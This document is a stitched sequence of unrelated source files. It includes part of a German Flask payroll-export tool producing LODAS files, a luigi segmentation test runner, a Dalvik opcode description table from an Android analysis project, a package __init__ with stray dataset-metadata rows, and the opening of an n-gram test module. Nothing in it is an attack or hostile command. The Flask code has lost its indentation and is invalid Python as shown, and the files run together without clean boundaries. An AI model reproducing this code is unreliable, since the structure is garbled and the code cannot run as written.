fileziel.write("10;"+var_abrjahr+"-"+var_abrmonat+"-01;"+request.form['form_personalnummer']+";"+var_9+";1;"+request.form['fw4']+";"+request.form['fk4']+";\n")
if request.form['form_personalnummer'] == "" or request.form['fw5'] == "":
pass
else:
fileziel.write("10;"+var_abrjahr+"-"+var_abrmonat+"-01;"+request.form['form_personalnummer']+";"+var_11+";1;"+request.form['fw5']+";"+request.form['fk5']+";\n")
if request.form['form_personalnummer'] == "" or request.form['fl6'] == "" or request.form['fw6'] == "":
pass
else:
fileziel.write("10;"+var_abrjahr+"-"+var_abrmonat+"-01;"+request.form['form_personalnummer']+";"+request.form['fl6']+";1;"+request.form['fw6']+";"+request.form['fk6']+";\n")
if request.form['form_personalnummer'] == "" or request.form['fl7'] == "" or request.form['fw7'] == "":
pass
else:
fileziel.write("10;"+var_abrjahr+"-"+var_abrmonat+"-01;"+request.form['form_personalnummer']+";"+request.form['fl7']+";1;"+request.form['fw7']+";"+request.form['fk7']+";\n")
if request.form['form_personalnummer'] == "" or request.form['fl8'] == "" or request.form['fw8'] == "":
pass
else:
fileziel.write("10;"+var_abrjahr+"-"+var_abrmonat+"-01;"+request.form['form_personalnummer']+";"+request.form['fl8']+";1;"+request.form['fw8']+";"+request.form['fk8']+";\n")
if request.form['form_personalnummer'] == "" or request.form['fl9'] == "" or request.form['fw9'] == "":
pass
else:
fileziel.write("10;"+var_abrjahr+"-"+var_abrmonat+"-01;"+request.form['form_personalnummer']+";"+request.form['fl9']+";1;"+request.form['fw9']+";"+request.form['fk9']+";\n")
fileziel.close()
else:
pass
return render_template('erfassungstunden.html', v_bnr=var_beraternummer, v_mdt=var_mandantenummer, v_monat=var_abrmonat, v_jahr=var_abrjahr, v_sn1=var_3,v_st1=var_4,v_sn2=var_5,v_st2=var_6,
v_sn3=var_7,v_st3=var_8,v_sn4=var_9,v_st4=var_10,v_sn5=var_11,v_st5=var_12,v_bn1=var_13,v_bt1=var_14,v_bn2=var_15,v_bt2=var_16,v_bn3=var_17,v_bt3=var_18,v_bn4=var_19,v_bt4=var_20,v_bn5=var_21,
v_bt5=var_22)
@app.route('/erfassungbetrag.html', methods=['POST', 'GET'])
def betragerfassung():
if os.path.exists("daten/basisdaten.txt"):
filequelle=open("daten/basisdaten.txt","r")
for x in filequelle:
var_beraternummer,var_mandantenummer,var_3,var_4,var_5,var_6,var_7,var_8,var_9,var_10,var_11,var_12,var_13,var_14,var_15,var_16,var_17,var_18,var_19,var_20,var_21,var_22=x.split("|")
break
filequelle.close()
else:
var_text="Fehler: Konfiguration ist nicht vorhanden! "
return render_template('index.html', v_text=var_text)
# return render_template('basisdaten.html')
if os.path.exists("daten/abrechnungszeitraum.txt"):
filequelle=open("daten/abrechnungszeitraum.txt","r", encoding='utf-8')
for x in filequelle:
var_abrmonat,var_abrjahr=x.split("|")
break
filequelle.close()
else:
var_text="Fehler: Du hast noch keinen Abrechnungszeitraum angelegt!"
return render_template('index.html', v_text=var_text)
if request.method == 'POST':
## read master data - quality assurance still missing
if os.path.exists("daten/abrechnungsdaten.txt"):
## Open the file and append the data
fileziel=open("daten/abrechnungsdaten.txt","a")
fileziel.write("\n* Beträge zur Abrechnung von Mitarbeitern\n")
fileziel.write("[Bewegungsdaten]\n\n")
else:
## Create the file and write the header data
fileziel=open("daten/abrechnungsdaten.txt","w")
# write to the LODAS import file
fileziel.write("[Allgemein]\nZiel=LODAS\nVersion_SST=1.0\nBeraterNr=")
fileziel.write(var_beraternummer)
fileziel.write("\nMandantenNr=")
fileziel.write(var_mandantenummer)
fileziel.write("\nDatumsformat=JJJJ-MM-TT")
# note: date exactly as delivered by Bootstrap
fileziel.write("\nStringbegrenzer='")
fileziel.write("\n\n* LEGENDE:\n* Datei erzeugt mit Tool pbd2lodas\n* AP: Andreé Rosenkranz; andree@rosenkranz.one\n\n")
fileziel.write("* Satzbeschreibungen zur Übergabe von Bewegungsdaten für Mitarbeiter\n[Satzbeschreibung]\n")
fileziel.write("\n10;u_lod_bwd_buchung_standard;abrechnung_zeitraum#bwd;pnr#bwd;la_eigene#bwd;bs_nr#bwd;bs_wert_butab#bwd;kostenstelle#bwd;")
fileziel.write("\n20;u_lod_psd_beschaeftigung;pnr#psd;eintrittdatum#psd;austrittdatum#psd;arbeitsverhaeltnis#psd;schriftl_befristung#psd;datum_urspr_befr#psd;abschl_befr_arbvertr#psd;verl_befr_arbvertr#psd;befr_gr_2_monate#psd;")
fileziel.write("\n21;u_lod_psd_mitarbeiter;pnr#psd;duevo_familienname#psd;duevo_vorname#psd;adresse_strassenname#psd;adresse_strasse_nr#psd;adresse_ort#psd;adresse_plz#psd;staatsangehoerigkeit#psd;geburtsdatum_ttmmjj#psd;geschlecht#psd;familienstand#psd;sozialversicherung_nr#psd;adresse_anschriftenzusatz#psd;gebort#psd;")
fileziel.write("\n22;u_lod_psd_taetigkeit;pnr#psd;berufsbezeichnung#psd;persgrs#psd;schulabschluss#psd;ausbildungsabschluss#psd;stammkostenstelle#psd;")
fileziel.write("\n23;u_lod_psd_arbeitszeit_regelm;pnr#psd;az_wtl_indiv#psd;")
fileziel.write("\n24;u_lod_psd_steuer;pnr#psd;identifikationsnummer#psd;els_2_haupt_ag_kz#psd;st_klasse#psd;kfb_anzahl#psd;faktor#psd;")
fileziel.write("\n25;u_lod_psd_sozialversicherung;pnr#psd;kz_zuschl_pv_kinderlose#psd;kv_bgrs#psd;rv_bgrs#psd;av_bgrs#psd;pv_bgrs#psd;")
fileziel.write("\n26;u_lod_psd_ma_bank;pnr#psd;ma_bank_zahlungsart#psd;ma_iban#psd;")
fileziel.write("\n27;u_lod_psd_festbezuege;pnr#psd;festbez_id#psd;lohnart_nr#psd;betrag#psd;")
fileziel.write("\n28;u_lod_psd_lohn_gehalt_bezuege;pnr#psd;std_lohn_1#psd;")
fileziel.write("\n\n")
fileziel.write("* Stunden und Beträge zur Abrechnung von Mitarbeitern\n\n")
fileziel.write("[Bewegungsdaten]\n\n")
if request.form['form_personalnummer'] == "" or request.form['form_wert'] == "":
pass  # required field is enforced in the frontend, so this case cannot occur
else:
fileziel.write("10;"+var_abrjahr+"-"+var_abrmonat+"-01;"+request.form['form_personalnummer']+";"+var_13+";2;"+request.form['form_wert']+";"+request.form['form_kostenstelle']+";\n")
if request.form['form_personalnummer'] == "" or request.form['fw2'] == "":
pass
else:
fileziel.write("10;"+var_abrjahr+"-"+var_abrmonat+"-01;"+request.form['form_personalnummer']+";"+var_15+";2;"+request.form['fw2']+";"+request.form['fk2']+";\n")
if request.form['form_personalnummer'] == "" or request.form['fw3'] == "":
pass
else:
fileziel.write("10;"+var_abrjahr+"-"+var_abrmonat+"-01;"+request.form['form_personalnummer']+";"+var_17+";2;"+request.form['fw3']+";"+request.form['fk3']+";\n")
if request.form['form_personalnummer'] == "" or request.form['fw4'] == "":
pass
else:
fileziel.write("10;"+var_abrjahr+"-"+var_abrmonat+"-01;"+request.form['form_personalnummer']+";"+var_19+";2;"+request.form['fw4']+";"+request.form['fk4']+";\n")
if request.form['form_personalnummer'] == "" or request.form['fw5'] == "":
pass
else:
fileziel.write("10;"+var_abrjahr+"-"+var_abrmonat+"-01;"+request.form['form_personalnummer']+";"+var_21+";2;"+request.form['fw5']+";"+request.form['fk5']+";\n")
if request.form['form_personalnummer'] == "" or request.form['fl6'] == "" or request.form['fw6'] == "":
pass
else:
fileziel.write("10;"+var_abrjahr+"-"+var_abrmonat+"-01;"+request.form['form_personalnummer']+";"+request.form['fl6']+";2;"+request.form['fw6']+";"+request.form['fk6']+";\n")
if request.form['form_personalnummer'] == "" or request.form['fl7'] == "" or request.form['fw7'] == "":
pass
else:
fileziel.write("10;"+var_abrjahr+"-"+var_abrmonat+"-01;"+request.form['form_personalnummer']+";"+request.form['fl7']+";2;"+request.form['fw7']+";"+request.form['fk7']+";\n")
if request.form['form_personalnummer'] == "" or request.form['fl8'] == "" or request.form['fw8'] == "":
pass
else:
fileziel.write("10;"+var_abrjahr+"-"+var_abrmonat+"-01;"+request.form['form_personalnummer']+";"+request.form['fl8']+";2;"+request.form['fw8']+";"+request.form['fk8']+";\n")
if request.form['form_personalnummer'] == "" or request.form['fl9'] == "" or request.form['fw9'] == "":
pass
else:
fileziel.write("10;"+var_abrjahr+"-"+var_abrmonat+"-01;"+request.form['form_personalnummer']+";"+request.form['fl9']+";2;"+request.form['fw9']+";"+request.form['fk9']+";\n")
fileziel.close()
else:
pass
return render_template('erfassungbetrag.html', v_bnr=var_beraternummer, v_mdt=var_mandantenummer, v_monat=var_abrmonat, v_jahr=var_abrjahr,v_sn1=var_3,v_st1=var_4,v_sn2=var_5,v_st2=var_6,
v_sn3=var_7,v_st3=var_8,v_sn4=var_9,v_st4=var_10,v_sn5=var_11,v_st5=var_12,v_bn1=var_13,v_bt1=var_14,v_bn2=var_15,v_bt2=var_16,v_bn3=var_17,v_bt3=var_18,v_bn4=var_19,v_bt4=var_20,v_bn5=var_21,
v_bt5=var_22)
@app.route('/konvertierung.html', methods=['POST', 'GET'])
def konvert():
if os.path.exists("daten/basisdaten.txt"):
filequelle=open("daten/basisdaten.txt","r")
for x in filequelle:
var_beraternummer,var_mandantenummer,var_3,var_4,var_5,var_6,var_7,var_8,var_9,var_10,var_11,var_12,var_13,var_14,var_15,var_16,var_17,var_18,var_19,var_20,var_21,var_22=x.split("|")
break
filequelle.close()
else:
var_text=("Fehler: ** Es kann keine Lodas Datei erstellt werden ** Konfiguration nicht vorhanden! ****")
return render_template('index.html', v_text=var_text)
if os.path.exists("daten/abrechnungszeitraum.txt"):
filequelle=open("daten/abrechnungszeitraum.txt","r", encoding='utf-8')
for x in filequelle:
var_abrmonat,var_abrjahr=x.split("|")
break
filequelle.close()
else:
var_text="Fehler: ** Es kann keine Lodas Datei erstellt werden ** Du hast noch keinen Abrechnungszeitraum angelegt! ****"
return render_template('index.html', v_text=var_text)
if os.path.exists("daten/abrechnungsdaten.txt"):
copyfile('daten/abrechnungsdaten.txt', 'daten/'+var_abrjahr+var_abrmonat+'_'+var_mandantenummer+'_'+var_beraternummer+'_lodas.txt')
os.remove('daten/abrechnungszeitraum.txt')
os.remove('daten/abrechnungsdaten.txt')
var_text="Die Datei "+var_abrjahr+var_abrmonat+"_"+var_mandantenummer+"_"+var_beraternummer+"_lodas.txt wurde im Verzeichnis /daten erstellt. Stelle diese Datei deinem Steuerberater zur Verfügung."
else:
var_text="Fehler: **** Es gibt keine Datei mit Abrechnungsdaten, es konnte keine Datei konvertiert werden. ****"
return render_template('index.html', v_text=var_text)
webbrowser.open('http://'+setting.Flask_Server_Name)
if __name__ =='__main__':
app.run(port=1701, debug=False)
import sys
import luigi
from mc_luigi import PipelineParameter
from mc_luigi import WsdtSegmentation
def wsdt_default():
    ppl_parameter = PipelineParameter()
    ppl_parameter.useN5Backend = True
    ppl_parameter.read_input_file('./inputs.json')
    ppl_parameter.nThreads = 8
    ppl_parameter.wsdtInvert = True
    inp = ppl_parameter.inputs['data'][1]
    luigi.run(["--local-scheduler",
               "--pathToProbabilities", inp,
               "--keyToProbabilities", "data"],
              WsdtSegmentation)


def wsdt_nominseg():
    ppl_parameter = PipelineParameter()
    ppl_parameter.useN5Backend = True
    ppl_parameter.read_input_file('./inputs.json')
    ppl_parameter.wsdtMinSeg = 0
    ppl_parameter.nThreads = 8
    ppl_parameter.wsdtInvert = True
    inp = ppl_parameter.inputs['data'][1]
    luigi.run(["--local-scheduler",
               "--pathToProbabilities", inp,
               "--keyToProbabilities", "data"],
              WsdtSegmentation)


def wsdt_masked():
    ppl_parameter = PipelineParameter()
    ppl_parameter.useN5Backend = True
    ppl_parameter.read_input_file('./inputs.json')
    inp = ppl_parameter.inputs['data'][1]
    ppl_parameter.nThreads = 8
    ppl_parameter.wsdtInvert = True
    mask = ppl_parameter.inputs['mask']
    luigi.run(["--local-scheduler",
               "--pathToProbabilities", inp,
               "--keyToProbabilities", "data",
               "--pathToMask", mask],
              WsdtSegmentation)


def wsdt_masked_nominseg():
    ppl_parameter = PipelineParameter()
    ppl_parameter.useN5Backend = True
    ppl_parameter.read_input_file('./inputs.json')
    inp = ppl_parameter.inputs['data'][1]
    ppl_parameter.wsdtMinSeg = 0
    ppl_parameter.nThreads = 8
    ppl_parameter.wsdtInvert = True
    mask = ppl_parameter.inputs['mask']
    luigi.run(["--local-scheduler",
               "--pathToProbabilities", inp,
               "--keyToProbabilities", "data",
               "--pathToMask", mask],
              WsdtSegmentation)


if __name__ == '__main__':
    test = sys.argv[1]
    if test == 'default':
        wsdt_default()
    elif test == 'nominseg':
        wsdt_nominseg()
    elif test == 'masked':
        wsdt_masked()
    elif test == 'masked_nominseg':
        wsdt_masked_nominseg()
    else:
        assert False, "unknown test: {}".format(test)
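The `if`/`elif` chain above can equivalently be expressed as a dispatch table; a sketch under that assumption (the `run_test` helper is illustrative, not part of mc_luigi):

```python
def run_test(name, table):
    """Look up a test by name in a dispatch table and execute it; fail loudly on unknown names."""
    try:
        func = table[name]
    except KeyError:
        raise ValueError(f"unknown test: {name!r}") from None
    return func()


# dummy callables stand in for the wsdt_* functions
tests = {"default": lambda: "ran default", "nominseg": lambda: "ran nominseg"}
print(run_test("default", tests))  # ran default
```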
# File: ares/core/constants.py (DarioI/DroidSec, Apache-2.0)

# This file is part of ARES.
#
# Copyright (C) 2015, Dario Incalza <dario.incalza at gmail.com>
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__author__ = 'Dario Incalza <dario.incalza@gmail.com>'
TAINTED_PACKAGE_CREATE = 0
TAINTED_PACKAGE_CALL = 1
TAINTED_PACKAGE = {
    TAINTED_PACKAGE_CREATE: "C",
    TAINTED_PACKAGE_CALL: "M",
}
DEX_BYTECODE_SET = {
"nop": "Waste cycles.",
"move": "Move the contents of one non-object register to another.",
"move-wide": "Move the contents of one register-pair to another.\nNote: It is legal to move from vN to either vN-1 or vN+1, so implementations must arrange for both halves of a register pair to be read before anything is written.",
"move-object": "Move the contents of one object-bearing register to another.",
"move-result": "Move the single-word non-object result of the most recent invoke-kind into the indicated register. This must be done as the instruction immediately after an invoke-kind whose (single-word, non-object) result is not to be ignored; anywhere else is invalid.",
"move-result-wide": "Move the double-word result of the most recent invoke-kind into the indicated register pair. This must be done as the instruction immediately after an invoke-kind whose (double-word) result is not to be ignored; anywhere else is invalid.",
"move-result-object": "Move the object result of the most recent invoke-kind into the indicated register. This must be done as the instruction immediately after an invoke-kind or filled-new-array whose (object) result is not to be ignored; anywhere else is invalid.",
"move-exception": "Save a just-caught exception into the given register. This must be the first instruction of any exception handler whose caught exception is not to be ignored, and this instruction must only ever occur as the first instruction of an exception handler; anywhere else is invalid.",
"return-void": "Return from a void method.",
"return": "Return from a single-width (32-bit) non-object value-returning method.",
"return-wide": "Return from a double-width (64-bit) value-returning method.",
"return-object": "Return from an object-returning method.",
"const": "Move the given literal value (sign-extended to 32 bits) into the specified register.",
"const-wide": "Move the given literal value (sign-extended to 64 bits) into the specified register-pair.",
"const-string": "Move a reference to the string specified by the given index into the specified register.",
"const-class": "Move a reference to the class specified by the given index into the specified register. In the case where the indicated type is primitive, this will store a reference to the primitive type's degenerate class.",
"monitor-enter": "Acquire the monitor for the indicated object.",
"monitor-exit": "Release the monitor for the indicated object.\nNote: If this instruction needs to throw an exception, it must do so as if the pc has already advanced past the instruction. It may be useful to think of this as the instruction successfully executing (in a sense), and the exception getting thrown after the instruction but before the next one gets a chance to run. This definition makes it possible for a method to use a monitor cleanup catch-all (e.g., finally) block as the monitor cleanup for that block itself, as a way to handle the arbitrary exceptions that might get thrown due to the historical implementation of Thread.stop(), while still managing to have proper monitor hygiene.",
"check-cast": "Throw a ClassCastException if the reference in the given register cannot be cast to the indicated type.",
"instance-of": "Store in the given destination register 1 if the indicated reference is an instance of the given type, or 0 if not.",
"array-length": "Store in the given destination register the length of the indicated array, in entries.",
"new-instance": "Construct a new instance of the indicated type, storing a reference to it in the destination. The type must refer to a non-array class.",
"new-array" : "Construct a new array of the indicated type and size. The type must be an array type.",
"filled-new-array" : "Construct an array of the given type and size, filling it with the supplied contents. The type must be an array type. The array's contents must be single-word (that is, no arrays of long or double, but reference types are acceptable). The constructed instance is stored as a 'result' in the same way that the method invocation instructions store their results, so the constructed instance must be moved to a register with an immediately subsequent move-result-object instruction (if it is to be used).",
"fill-array-data" : "Fill the given array with the indicated data. The reference must be to an array of primitives, and the data table must match it in type and must contain no more elements than will fit in the array. That is, the array may be larger than the table, and if so, only the initial elements of the array are set.",
"throw" : "Throw the indicated exception.",
"goto" : "Unconditionally jump to the indicated instruction.\nNote: The branch offset must not be 0. (A spin loop may be legally constructed either with goto/32 or by including a nop as a target before the branch.)",
"packed-switch" : "Jump to a new instruction based on the value in the given register, using a table of offsets corresponding to each value in a particular integral range, or fall through to the next instruction if there is no match.",
"sparse-switch" : "Jump to a new instruction based on the value in the given register, using an ordered table of value-offset pairs, or fall through to the next instruction if there is no match.",
"if-eq" : "Branch to the given destination if the given two registers' values compare as specified.",
"if-ne" : "Branch to the given destination if the given two registers' values compare as specified.",
"if-lt" : "Branch to the given destination if the given two registers' values compare as specified.",
"if-ge" : "Branch to the given destination if the given two registers' values compare as specified.",
"if-gt" : "Branch to the given destination if the given two registers' values compare as specified.",
"if-le" : "Branch to the given destination if the given two registers' values compare as specified.",
"if-eqz" : "Branch to the given destination if the given register's value compares with 0 as specified.",
"if-nez" : "Branch to the given destination if the given register's value compares with 0 as specified.",
"if-ltz" : "Branch to the given destination if the given register's value compares with 0 as specified.",
"if-gez" : "Branch to the given destination if the given register's value compares with 0 as specified.",
"if-gtz" : "Branch to the given destination if the given register's value compares with 0 as specified.",
"if-lez" : "Branch to the given destination if the given register's value compares with 0 as specified.",
"aget" : "Perform the identified array operation at the identified index of the given array, loading or storing into the value register.",
"aget-wide":"Perform the identified array operation at the identified index of the given array, loading or storing into the value register.",
"aget-object":"Perform the identified array operation at the identified index of the given array, loading or storing into the value register.",
"aget-boolean":"Perform the identified array operation at the identified index of the given array, loading or storing into the value register.",
"aget-byte":"Perform the identified array operation at the identified index of the given array, loading or storing into the value register.",
"aget-char":"Perform the identified array operation at the identified index of the given array, loading or storing into the value register.",
"aget-short":"Perform the identified array operation at the identified index of the given array, loading or storing into the value register.",
"aput":"Perform the identified array operation at the identified index of the given array, loading or storing into the value register.",
"aput-wide":"Perform the identified array operation at the identified index of the given array, loading or storing into the value register.",
"aput-object":"Perform the identified array operation at the identified index of the given array, loading or storing into the value register.",
"aput-boolean":"Perform the identified array operation at the identified index of the given array, loading or storing into the value register.",
"aput-byte":"Perform the identified array operation at the identified index of the given array, loading or storing into the value register.",
"aput-char":"Perform the identified array operation at the identified index of the given array, loading or storing into the value register.",
"aput-short":"Perform the identified array operation at the identified index of the given array, loading or storing into the value register.",
"iget":"Perform the identified object instance field operation with the identified field, loading or storing into the value register.\nNote: These opcodes are reasonable candidates for static linking, altering the field argument to be a more direct offset.",
"iget-wide":"Perform the identified object instance field operation with the identified field, loading or storing into the value register.\nNote: These opcodes are reasonable candidates for static linking, altering the field argument to be a more direct offset.",
"iget-object":"Perform the identified object instance field operation with the identified field, loading or storing into the value register.\nNote: These opcodes are reasonable candidates for static linking, altering the field argument to be a more direct offset.",
"iget-boolean":"Perform the identified object instance field operation with the identified field, loading or storing into the value register.\nNote: These opcodes are reasonable candidates for static linking, altering the field argument to be a more direct offset.",
"iget-byte":"Perform the identified object instance field operation with the identified field, loading or storing into the value register.\nNote: These opcodes are reasonable candidates for static linking, altering the field argument to be a more direct offset.",
"iget-char":"Perform the identified object instance field operation with the identified field, loading or storing into the value register.\nNote: These opcodes are reasonable candidates for static linking, altering the field argument to be a more direct offset.",
"iget-short":"Perform the identified object instance field operation with the identified field, loading or storing into the value register.\nNote: These opcodes are reasonable candidates for static linking, altering the field argument to be a more direct offset.",
"iput":"Perform the identified object instance field operation with the identified field, loading or storing into the value register.\nNote: These opcodes are reasonable candidates for static linking, altering the field argument to be a more direct offset.",
"iput-wide":"Perform the identified object instance field operation with the identified field, loading or storing into the value register.\nNote: These opcodes are reasonable candidates for static linking, altering the field argument to be a more direct offset.",
"iput-object":"Perform the identified object instance field operation with the identified field, loading or storing into the value register.\nNote: These opcodes are reasonable candidates for static linking, altering the field argument to be a more direct offset.",
"iput-boolean":"Perform the identified object instance field operation with the identified field, loading or storing into the value register.\nNote: These opcodes are reasonable candidates for static linking, altering the field argument to be a more direct offset.",
"iput-byte":"Perform the identified object instance field operation with the identified field, loading or storing into the value register.\nNote: These opcodes are reasonable candidates for static linking, altering the field argument to be a more direct offset.",
"iput-char":"Perform the identified object instance field operation with the identified field, loading or storing into the value register.\nNote: These opcodes are reasonable candidates for static linking, altering the field argument to be a more direct offset.",
"iput-short":"Perform the identified object instance field operation with the identified field, loading or storing into the value register.\nNote: These opcodes are reasonable candidates for static linking, altering the field argument to be a more direct offset.",
"sget":"Perform the identified object static field operation with the identified static field, loading or storing into the value register.\nNote: These opcodes are reasonable candidates for static linking, altering the field argument to be a more direct offset.",
"sget-wide":"Perform the identified object static field operation with the identified static field, loading or storing into the value register.\nNote: These opcodes are reasonable candidates for static linking, altering the field argument to be a more direct offset.",
"sget-object":"Perform the identified object static field operation with the identified static field, loading or storing into the value register.\nNote: These opcodes are reasonable candidates for static linking, altering the field argument to be a more direct offset.",
"sget-boolean":"Perform the identified object static field operation with the identified static field, loading or storing into the value register.\nNote: These opcodes are reasonable candidates for static linking, altering the field argument to be a more direct offset.",
"sget-byte":"Perform the identified object static field operation with the identified static field, loading or storing into the value register.\nNote: These opcodes are reasonable candidates for static linking, altering the field argument to be a more direct offset.",
"sget-char":"Perform the identified object static field operation with the identified static field, loading or storing into the value register.\nNote: These opcodes are reasonable candidates for static linking, altering the field argument to be a more direct offset.",
"sget-short":"Perform the identified object static field operation with the identified static field, loading or storing into the value register.\nNote: These opcodes are reasonable candidates for static linking, altering the field argument to be a more direct offset.",
"sput":"Perform the identified object static field operation with the identified static field, loading or storing into the value register.\nNote: These opcodes are reasonable candidates for static linking, altering the field argument to be a more direct offset.",
"sput-wide":"Perform the identified object static field operation with the identified static field, loading or storing into the value register.\nNote: These opcodes are reasonable candidates for static linking, altering the field argument to be a more direct offset.",
"sput-object":"Perform the identified object static field operation with the identified static field, loading or storing into the value register.\nNote: These opcodes are reasonable candidates for static linking, altering the field argument to be a more direct offset.",
"sput-boolean":"Perform the identified object static field operation with the identified static field, loading or storing into the value register.\nNote: These opcodes are reasonable candidates for static linking, altering the field argument to be a more direct offset.",
"sput-byte":"Perform the identified object static field operation with the identified static field, loading or storing into the value register.\nNote: These opcodes are reasonable candidates for static linking, altering the field argument to be a more direct offset.",
"sput-char":"Perform the identified object static field operation with the identified static field, loading or storing into the value register.\nNote: These opcodes are reasonable candidates for static linking, altering the field argument to be a more direct offset.",
"sput-short":"Perform the identified object static field operation with the identified static field, loading or storing into the value register.\nNote: These opcodes are reasonable candidates for static linking, altering the field argument to be a more direct offset.",
"invoke-virtual":"invoke-virtual is used to invoke a normal virtual method (a method that is not private, static, or final, and is also not a constructor)",
"invoke-super":"invoke-super is used to invoke the closest superclass's virtual method (as opposed to the one with the same method_id in the calling class). The same method restrictions hold as for invoke-virtual.",
"invoke-direct":"invoke-direct is used to invoke a non-static direct method (that is, an instance method that is by its nature non-overridable, namely either a private instance method or a constructor).",
"invoke-static":"invoke-static is used to invoke a static method (which is always considered a direct method).",
"invoke-interface":"invoke-interface is used to invoke an interface method, that is, on an object whose concrete class isn't known, using a method_id that refers to an interface.",
"neg-int":"Perform the identified unary operation on the source register, storing the result in the destination register.",
"not-int":"Perform the identified unary operation on the source register, storing the result in the destination register.",
"neg-long":"Perform the identified unary operation on the source register, storing the result in the destination register.",
"not-long":"Perform the identified unary operation on the source register, storing the result in the destination register.",
"neg-float":"Perform the identified unary operation on the source register, storing the result in the destination register.",
"neg-double":"Perform the identified unary operation on the source register, storing the result in the destination register.",
"int-to-long":"Perform the identified unary operation on the source register, storing the result in the destination register.",
"int-to-float":"Perform the identified unary operation on the source register, storing the result in the destination register.",
"int-to-double":"Perform the identified unary operation on the source register, storing the result in the destination register.",
"long-to-int":"Perform the identified unary operation on the source register, storing the result in the destination register.",
"long-to-float":"Perform the identified unary operation on the source register, storing the result in the destination register.",
"long-to-double":"Perform the identified unary operation on the source register, storing the result in the destination register.",
"float-to-int":"Perform the identified unary operation on the source register, storing the result in the destination register.",
"float-to-long":"Perform the identified unary operation on the source register, storing the result in the destination register.",
"float-to-double":"Perform the identified unary operation on the source register, storing the result in the destination register.",
"double-to-int":"Perform the identified unary operation on the source register, storing the result in the destination register.",
"double-to-long":"Perform the identified unary operation on the source register, storing the result in the destination register.",
"double-to-float":"Perform the identified unary operation on the source register, storing the result in the destination register.",
"int-to-byte":"Perform the identified unary operation on the source register, storing the result in the destination register.",
"int-to-char":"Perform the identified unary operation on the source register, storing the result in the destination register.",
"int-to-short":"Perform the identified unary operation on the source register, storing the result in the destination register."
}
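A quick sketch of how a table like `DEX_BYTECODE_SET` might be consumed, e.g. resolving a mnemonic to its description for display, with a fallback for unknown opcodes (the `describe` helper is illustrative, not part of ARES):

```python
def describe(mnemonic, table):
    """Return the documentation string for a Dalvik mnemonic, or a placeholder."""
    return table.get(mnemonic, "<no documentation for %r>" % mnemonic)


# small excerpt of DEX_BYTECODE_SET so the demo is self-contained
sample = {"nop": "Waste cycles.", "throw": "Throw the indicated exception."}
print(describe("nop", sample))      # Waste cycles.
print(describe("foo-bar", sample))  # <no documentation for 'foo-bar'>
```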
# File: python/lib/lib_care/model/__init__.py (timtyree/bgmc, MIT)

from .LR_model_optimized import *
from .LR_model import *
from .minimal_model import *
from .recall_fits import *
| 22.8 | 33 | 0.789474 | 17 | 114 | 5 | 0.470588 | 0.352941 | 0.258824 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.140351 | 114 | 4 | 34 | 28.5 | 0.867347 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
0fd4252d39b73ef147d5405084543b8526eb1b4b | 8,272 | py | Python | book-code/numpy-ml/numpy_ml/tests/test_ngram.py | yangninghua/code_library | b769abecb4e0cbdbbb5762949c91847a0f0b3c5a | [
"MIT"
] | null | null | null | book-code/numpy-ml/numpy_ml/tests/test_ngram.py | yangninghua/code_library | b769abecb4e0cbdbbb5762949c91847a0f0b3c5a | [
"MIT"
] | null | null | null | book-code/numpy-ml/numpy_ml/tests/test_ngram.py | yangninghua/code_library | b769abecb4e0cbdbbb5762949c91847a0f0b3c5a | [
"MIT"
] | null | null | null | # flake8: noqa
import tempfile
import nltk
import numpy as np
from ..preprocessing.nlp import tokenize_words
from ..ngram import AdditiveNGram, MLENGram
from ..utils.testing import random_paragraph
class MLEGold:
def __init__(
self, N, K=1, unk=True, filter_stopwords=True, filter_punctuation=True
):
self.N = N
self.K = K
self.unk = unk
self.filter_stopwords = filter_stopwords
self.filter_punctuation = filter_punctuation
self.hyperparameters = {
"N": N,
"K": K,
"unk": unk,
"filter_stopwords": filter_stopwords,
"filter_punctuation": filter_punctuation,
}
def train(self, corpus_fp, vocab=None, encoding=None):
N = self.N
H = self.hyperparameters
models, counts = {}, {}
grams = {n: [] for n in range(1, N + 1)}
gg = {n: [] for n in range(1, N + 1)}
filter_punc, filter_stop = H["filter_punctuation"], H["filter_stopwords"]
n_words = 0
        tokens = set()
with open(corpus_fp, "r", encoding=encoding) as text:
for line in text:
words = tokenize_words(line, filter_punc, filter_stop)
if vocab is not None:
words = vocab.filter(words, H["unk"])
if len(words) == 0:
continue
n_words += len(words)
tokens.update(words)
# calculate n, n-1, ... 1-grams
for n in range(1, N + 1):
grams[n].append(
nltk.ngrams(
words,
n,
pad_left=True,
pad_right=True,
left_pad_symbol="<bol>",
right_pad_symbol="<eol>",
)
)
gg[n].extend(
list(
nltk.ngrams(
words,
n,
pad_left=True,
pad_right=True,
left_pad_symbol="<bol>",
right_pad_symbol="<eol>",
)
)
)
for n in range(1, N + 1):
counts[n] = nltk.FreqDist(gg[n])
models[n] = nltk.lm.MLE(order=n)
models[n].fit(grams[n], tokens)
self.counts = counts
self.n_words = n_words
self._models = models
self.n_tokens = len(vocab) if vocab is not None else len(tokens)
def log_prob(self, words, N):
assert N in self.counts, "You do not have counts for {}-grams".format(N)
if N > len(words):
err = "Not enough words for a gram-size of {}: {}".format(N, len(words))
raise ValueError(err)
total_prob = 0
for ngram in nltk.ngrams(words, N):
total_prob += self._log_ngram_prob(ngram)
return total_prob
def _log_ngram_prob(self, ngram):
N = len(ngram)
return self._models[N].logscore(ngram[-1], ngram[:-1])
class AdditiveGold:
def __init__(
self, N, K=1, unk=True, filter_stopwords=True, filter_punctuation=True
):
self.N = N
self.K = K
self.unk = unk
self.filter_stopwords = filter_stopwords
self.filter_punctuation = filter_punctuation
self.hyperparameters = {
"N": N,
"K": K,
"unk": unk,
"filter_stopwords": filter_stopwords,
"filter_punctuation": filter_punctuation,
}
